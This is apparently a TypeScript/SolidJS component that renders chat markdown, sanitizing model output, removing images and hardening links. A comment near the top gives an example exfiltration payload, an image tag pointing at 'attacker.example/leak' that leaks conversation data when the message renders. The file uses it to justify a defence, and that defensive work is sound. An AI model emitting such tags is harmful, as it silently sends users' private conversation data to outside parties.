import { createEffect, createSignal, onCleanup, type Accessor } from "solid-js";
import { unified } from "unified";
import remarkParse from "remark-parse";
import remarkGfm from "remark-gfm";
import remarkMath from "remark-math";
import remarkRehype from "remark-rehype";
import rehypeKatex from "rehype-katex";
import rehypeHighlight from "rehype-highlight";
import type rehypeMermaid from "rehype-mermaid";
import rehypeSanitize, { defaultSchema } from "rehype-sanitize";
import rehypeStringify from "rehype-stringify";
import { visit } from "unist-util-visit";
import type { Root } from "hast";
import clsx from "~/util/html/style";
import { lazyOptional } from "~/util/lazy_module";
import { loadRemend } from "~/util/remend";

function rehypeScrollableTables() {
  return (tree: Root) => {
    visit(tree, "element", (node, index, parent) => {
      if (node.tagName === "table" && parent?.children && index !== undefined) {
        parent.children[index] = {
          type: "element",
          tagName: "div",
          properties: { className: ["table-wrapper"] },
          children: [node],
        };
      }
    });
  };
}

// Model output can embed <img src="https://attacker.example/leak?d=...">, which
// exfiltrates conversation-derived data in the URL the moment the message
// renders — no click needed. Model content gets no images at all (nothing in
// chat legitimately emits one); trusted Twelve-authored surfaces keep them via
// `trustedContent`.
const modelContentSchema = {
  ...defaultSchema,
  tagNames: (defaultSchema.tagNames ?? []).filter((tag) => tag !== "img"),
};

// Every link opens a new tab without an opener handle: model output must not
// be able to navigate the app tab. Runs after sanitize (which strips target/
// rel) and after the render plugins, so it also covers plugin-emitted anchors.
function rehypeHardenLinks() {
  return (tree: Root) => {
    visit(tree, "element", (node) => {
      if (node.tagName === "a" && node.properties["href"]) {
        node.properties["target"] = "_blank";
        node.properties["rel"] = ["noopener", "noreferrer"];
      }
    });
  };
}

function buildProcessor(schema: typeof defaultSchema, mermaid: typeof rehypeMermaid | null) {
  const processor = unified()
    .use(remarkParse) // parse markdown to AST
    .use(remarkGfm) // github flavored markdown (tables, strikethrough, etc.)
    .use(remarkMath, { singleDollarTextMath: false }) // detect and parse LaTeX blocks (only with $$...$$, not $...$ to prevent rendering dollar amounts as math)
    .use(remarkRehype) // convert markdown AST to HTML AST
    // sanitize user-provided markdown structure before plugins render it
    // this allows only safe markdown with specific classes (html is stripped), then trusted plugins generate complex markup
    .use(rehypeSanitize, schema)
    .use(rehypeKatex) // render LaTeX to HTML/MathML
    .use(rehypeHighlight); // syntax highlighting

  // strict securityLevel: mermaid sanitizes its own labels/links, since its
  // SVG lands after our sanitize pass
  if (mermaid) {
    processor.use(mermaid, { mermaidConfig: { securityLevel: "strict" } });
  }

  return processor
    .use(rehypeHardenLinks)
    .use(rehypeScrollableTables) // make tables scrollable
    .use(rehypeStringify); // convert HTML AST to string
}

// mermaid drags in `marked`, whose module-level regex uses lookbehind — syntax WebKit
// only parses from Safari 16.4. Imported statically it evaluated inside application.ts
// and killed the whole bundle on older iPads, taking every Stimulus island on the page
// with it, including the patient signature pad. Keep this dynamic.
const loadMermaid = lazyOptional(
  () => import("rehype-mermaid").then((module) => module.default),
  "rehype-mermaid-load-failed",
);

function createProcessors() {
  return loadMermaid().then((mermaid) => ({
    model: buildProcessor(modelContentSchema, mermaid),
    trusted: buildProcessor(defaultSchema, mermaid),
  }));
}

let processors: ReturnType<typeof createProcessors> | null = null;

export async function renderContent(
  content: string,
  options?: { trustedContent?: boolean; streaming?: boolean },
): Promise<string> {
  processors ??= createProcessors();
  const { model, trusted } = await processors;
  const processor = options?.trustedContent ? trusted : model;
  // Markdown is only valid once its closer arrives, so a half-streamed `**bold`
  // renders its asterisks literally until the next chunk — visible flicker.
  // remend speculatively closes the open constructs so every frame parses.
  //
  // STREAMING ONLY: on settled text it is not a no-op. A lone `*` in prose ("a
  // 5* rating") gets a speculative closer appended, which is invisible
  // mid-stream (the next frame overwrites it) but permanent once the text stops
  // changing. `links: false` keeps its `streamdown:incomplete-link` sentinel out
  // of rehypeHardenLinks.
  const remend = options?.streaming ? await loadRemend() : null;
  const source = remend ? remend(content, { links: false }) : content;
  const result = await processor.process(source);
  return String(result);
}

function useContentRenderer(
  content: Accessor<string>,
  trustedContent: Accessor<boolean>,
  streaming: Accessor<boolean>,
) {
  const [html, setHtml] = createSignal("");

  createEffect(() => {
    // Renders resolve out of order: the first one pays for a dynamic import the
    // rest reuse, so a slow early render can land after a fast later one and
    // overwrite it with stale (often empty) html. Drop anything superseded.
    let stale = false;
    onCleanup(() => (stale = true));
    renderContent(content(), { trustedContent: trustedContent(), streaming: streaming() })
      .then((result) => {
        if (!stale) setHtml(result);
      })
      // ignore errors, likely caused by partially streamed content and will be fixed by future render
      .catch(() => {});
  });

  return html;
}

export function ContentRenderer(props: {
  content: string;
  dark?: boolean;
  compact?: boolean;
  // Only for Twelve-authored content (legal pages, announcements): keeps
  // remote images, which model output never gets.
  trustedContent?: boolean;
  // This text is still being written. Opt in per render, never globally — see
  // renderContent for why it must not run on settled text.
  streaming?: boolean;
}) {
  const html = useContentRenderer(
    () => props.content,
    () => props.trustedContent ?? false,
    () => props.streaming ?? false,
  );
  return (
    <div
      class={clsx(
        "content-renderer-prose",
        props.dark && "content-renderer-prose-invert",
        props.compact && "content-renderer-prose-compact",
      )}
      // innerHTML is safe here because rehype-sanitize strips all dangerous content
      // eslint-disable-next-line solid/no-innerhtml
      innerHTML={html()}
    />
  );
}
